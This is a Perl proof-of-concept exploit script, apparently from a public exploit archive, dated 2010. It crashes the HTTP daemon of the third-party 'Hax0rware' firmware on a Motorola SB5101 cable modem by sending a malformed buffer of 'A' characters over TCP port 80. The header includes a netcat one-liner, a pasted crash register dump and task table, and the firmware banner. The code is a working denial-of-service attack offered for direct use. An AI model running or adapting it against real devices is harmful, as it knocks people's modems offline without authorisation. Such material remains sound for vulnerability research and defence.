#!/usr/bin/perl # Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC # Author: Dillon Beresford # Date: 6/6/2010 # Vendor: SBHacker & Motorola # Software Link: http://www.sbhacker.net/forum/index.php # Tested on Hax0rware 1.1 R30, R32 and R39 # Description: Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit # If an unauthenticated user or attacker sends any number of bytes greater than 1 # to port 80 without a proper request line, such as, [ GET /somepath/file.cgi ] # the http daemon triggers a crash on thread at 0x8054b9ac Rajko HttpD. # The developer of Hax0rware said he has used the modem's local ip to bind to the webserver # to prevent attackers from triggering the vuln... This seems to be a quick fix atm. # I'm sure he will eventually fix the bug and update the firmware. # Motorola and Cable providers should warn their customers ( there are a number of legit ) # customers using this firmware for testing. Its important that you let # customers know about the risk of third party firmware that isn't open source. # nc 192.168.100.1 80 <sendsomeevil> # For debugging telnet into the device 192.168.100.1 and run the poc. # >>> YIKES... looks like you may have a problem! <<< # r0/zero=00000000 r1/at=fffffffe r2/v0=805a1800 r3/v1=00000000 # r4/a0=8054aa58 r5/a1=00000000 r6/a2=00000000 r7/a3=00000000 # r8/t0=00000000 r9/t1=807bcae4 r10/t2 =00000041 r11/t3 =000043e0 # r12/t4 =4d154e68 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005 # r16/s0 =8054bacc r17/s1 =00000000 r18/s2 =805a1800 r19/s3 =00000000 # r20/s4 =00000001 r21/s5 =0000002a r22/s6 =8054b848 r23/s7 =00000001 # r24/t8 =00000000 r25/t9 =00000059 r26/k0 =00000000 r27/k1 =11110017 # r28/gp =80458fa0 r29/sp =8054b830 r30/fp =8054b960 r31/ra =8054a514 # PC : 0x8054a534error addr: 0x00000000 # cause: 0x00000008status: 0x1000ff03 # BCM interrupt enable: ffffbff7, status: 00000000 # Bad PC or SP.Can't trace the stack. # Task: Rajko HttpD # --------------------------------------------------- # ID: 0x0006 # Handle: 0x8054b9ac # Set Priority: 23 # Current Priority: 23 # State:SUSP # Stack Base: 0x8054acd4 # Stack Size: 3280 bytes # Stack Used: 1940 bytes # Stack StackStack #TaskId TaskNamePriority StateSizeUsed Margin # ---------- ------------------------------------------------------------------------ # 0x8048f818 Idle Thread31 RUN 2048 6161432 # 0x805131d0 Network alarm support 6 SLEEP 225612321024 # 0x804924c8 Network support 7 SLEEP 819217046488 # 0x80513f20pthread.0000080015EXIT 785211046748 # 0x8048a1c8tStartup18 SLEEP1228852087080 # 0x8054b9ac Rajko HttpD23SUSP 328019401340 # 0x807f579cNonVol Device Async Helper25 SLEEP 3072 5042568 # 0x807ebc7cMotorola Standby Switch Thread23 SLEEP 4096 4403656 # 0x807ea984Motorola Vendor Ctl Thread23 SLEEP 4096 5123584 # 0x807f64e8WDOG17 RUN 512027842336 # 0x807e86b4 BFC Ping Thread29 SLEEP 6144 4765668 # 0x807e4b3c ConsoleThread27 SLEEP368642172 34692 # 0x807d687c TelnetD23 RUN 22561980 276 # 0x807c666cCfgVB Thread23 SLEEP 4096 5043592 # 0x807c501cDHCM25 SLEEP16384 512 15872 # 0x807befacEvent Log Thread25 SLEEP 819221846008 # 0x8079a51cTime Of Day Thread23 SLEEP 6144 4565688 # 0x8079a98cCmDocsisIpThread23 SLEEP 8192 5047688 # 0x80793af8 CmBpiManagerThd25 SLEEP 8192 5087684 # 0x8078ff78 CmDsxHelper23 SLEEP 8192 5047688 # 0x807abf50 CmDocsisCtlThread21 SLEEP 8192 6087584 # 0x80788e44Scan Downstream Thread23 SLEEP 409614282668 # 0x80785c20RateShaping Thread23 SLEEP 4096 4443652 # 0x807f65e0CMHL23 SLEEP 4500 3684132 # 0x807f66d8CMHH21 SLEEP 4500 3524148 # 0x807f67d0ENRX23 RUN 450010283472 # 0x807f68c8ENTX23 SLEEP 4500 7843716 # 0x807f69c0ELNK23 SLEEP 4500 3204180 # 0x807f6ab8USTX23 SLEEP 4500 3404160 # 0x807f6bb0USRX23 SLEEP 4500 3724128 # 0x807f6ca8UBCT19 SLEEP 4500 3564144 # 0x807f6da0USRN23 SLEEP 4500 3404160 # 0x806a5a34DHCP Client Thread23 SLEEP12288 508 11780 # 0x807f6e98IpHalIst23 RUN 4500 8443656 # 0x8069fb98CmPropaneCtlThread23 SLEEP 819216286564 # 0x8069cf3c IGMP Thread23 SLEEP 4096 4563640 # 0x8069b640 NetToMedia Thread23 SLEEP 4096 7963300 # 0x806975a8 Trap Thread23 SLEEP16384 516 15868 # 0x807f6030 SNMP Thread23 SLEEP204801176 19304 # 0x805a7f0cDHCP Server Thread23 SLEEP 819214486744 # 0x8047b410tNonVolTimer30 SLEEP 204810281020 # Done! # * * #*** *** #*** *** #*** *** # ***** ***** # ***** ***** # ***** ***** #******* ******* #******* ******* #******* ******* # ********* ********* # ********* ********* # ******* ******* #********* #*** * *** #** ** # ** ** # ** ** #** ** #* * #MotorolaCorporation # +----------------------------------------------------------------------------+ # | _/_/ _/_/_/_/_/_/| # |_/_/ _/_/_/ Broadband | # | _/_/ _/_/| # |_/_/ _/_/_/_/ Foundation| # | _/_/ _/_/| # |_/ _/_/_/_/ Classes | # | _/_/_/ _/_/_/| # || # | Copyright (c) 1999 - 2007 Broadcom Corporation | # || # | Revision:3.9.33.3 RELEASE| # || # | Features:Console Nonvol Fat HeapManager SNMP Networking USB1.1 | # +----------------------------------------------------------------------------+ # | Standard Embedded Target Support for BFC | # || # | Copyright (c) 2003 - 2007 Broadcom Corporation | # || # | Revision:3.0.1 RELEASE | # || # | Features:PID=0xc011 Bootloader-Rev=2.1.6d| # | Copyright (c) 2003 - 2007 Broadcom Corporation | # || # | Revision:3.0.1 RELEASE | # || # | Features:PID=0xc011 Bootloader-Rev=2.1.6d| # | Features:Bootloader-Compression-Support=0x19 | # +----------------------------------------------------------------------------+ # | eCos BFC Application Layer | # || # | Copyright (c) 1999 - 2007 Broadcom Corporation | # || # | Revision:3.0.2 RELEASE | # || # | Features:eCos Console Cmds, (no Idle Loop Profiler)| # +----------------------------------------------------------------------------+ # | _/_/_/ _/| # |_/_/_/_/ _/_/ DOCSIS Cable Modem| # | _/_/_/ _/| # |_/_/ _/ | # | _/_/ _/| # |_/_/_/ _/ | # | _/_/_/ _/| # || # | Copyright (c) 1999 - 2005 Broadcom Corporation | # || # | Revision:3.9.33.3 RELEASE| # || # | Features:AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB | # | Features:Support CM Vendor Extension | # +----------------------------------------------------------------------------+ # | Motorola Data-Only CM Vendor Extension | # || # | Revision:3.0.0a RELEASE| # || # | Features:DHCP ServerHTTP Server| # +----------------------------------------------------------------------------+ # | Build Date:Apr 29 2009 | # | Build Time:15:08:51| # | Built By:vobadm02| # +----------------------------------------------------------------------------+ use strict; use Socket; my $buff = "\x41" x50; my $cablemodemip = shift || '192.168.100.1'; my $port = shift || 80; my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($cablemodemip); my $paddr = sockaddr_in($port, $iaddr); print "+---------------------------------------------------------------+\n". "| Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC|\n". "| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n". "| Version: 1.1 R30, R32 and R39 |\n". "| Vendor: Motorola Corporation and SBHacker |\n". "| Author: Dillon Beresford|\n". "| Date: 6/6/2010|\n". "+---------------------------------------------------------------+\n"; socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; print "[+] Connecting to cable modem httpd at $cablemodemip on port $port\n"; connect(SOCKET, $paddr) or die "connect: $!"; print "[+] Sending our evil buffer...\n"; print SOCKET $buff."\n"; print "[+] Payload sent\n"; print "[+] This takes some time please wait.\n"; print "[+] Dont look at me look at the leds on your modem\n"; close SOCKET or die "close: $!"; sleep(25); print "[+] Bye Bye Motorola SB5101 \n";
体验盒子
